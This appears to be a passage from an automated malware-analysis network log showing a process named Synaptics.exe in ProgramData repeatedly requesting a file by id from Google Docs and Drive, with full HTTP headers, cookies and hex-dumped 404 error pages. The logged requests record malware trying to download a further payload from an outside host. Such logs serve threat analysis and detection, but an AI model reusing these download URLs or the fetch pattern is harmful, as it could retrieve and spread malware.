                                                                                                                                        2024-12-30 10:46:31 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                        2024-12-30 10:46:31 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 57 62 6c 66 69 45 61 58 55 6d 6e 4a 2d 59 62 53 6d 33 36 31 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="PWblfiEaXUmnJ-YbSm361w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:31 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        38192.168.2.549772142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:32 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC5lsNClKSn5db9bU27Uyje9Z6XOKQrrvv7dyL4mfiJPEOW039smoGvvtaR_2xamTH1X
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:32 GMT
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-R7Q5-sFlFXCUwa2vSh0KVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:32 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                        2024-12-30 10:46:32 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 38 76 78 35 58 36 46 47 41 64 76 4e 66 67 5a 47 66 67 7a 47 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="M8vx5X6FGAdvNfgZGfgzGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:32 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        39192.168.2.549776142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:32 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                                                                                                                                        2024-12-30 10:46:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:32 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-GFn9Uken2U0THRpMjpaPiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        40192.168.2.549778142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:32 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:32 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC4BlNKBlY0iR8c48VlhhnGUzOzC4Qy9QSB-P5O2y7NZ2lfT2tsOcH_dgd5NGiMyatLlq0ng5vY
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:32 GMT
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-hpP6T0Ritup_f1cssajd4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:32 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                        2024-12-30 10:46:32 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 57 62 56 57 57 61 65 7a 33 56 53 68 35 75 6c 5f 59 52 51 6f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="DWbVWWaez3VSh5ul_YRQog">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:32 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        41192.168.2.549777142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:32 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                                                                                                                                        2024-12-30 10:46:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:32 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-zRgn4ilA1YqvmwSqB5fdGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        42192.168.2.549779142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:32 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:33 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC6dMrQDPsApcCtUzrwevCuvLGZGLQ7h8yXvstPvAW_x9-BovWjD8dnLWro_idiIVX0Zg-g-a68
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:33 GMT
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tumOFnVyVHgbKwJ9zWSZFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:33 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                        2024-12-30 10:46:33 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 7a 64 76 44 34 79 66 45 42 36 58 68 37 61 74 67 2d 6a 6e 4e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="DzdvD4yfEB6Xh7atg-jnNg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:33 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        43192.168.2.549788142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:33 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                                                                                                                                        2024-12-30 10:46:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:33 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-lfTwmwcCAnziAO0MVyhJJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        44192.168.2.549793142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:33 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
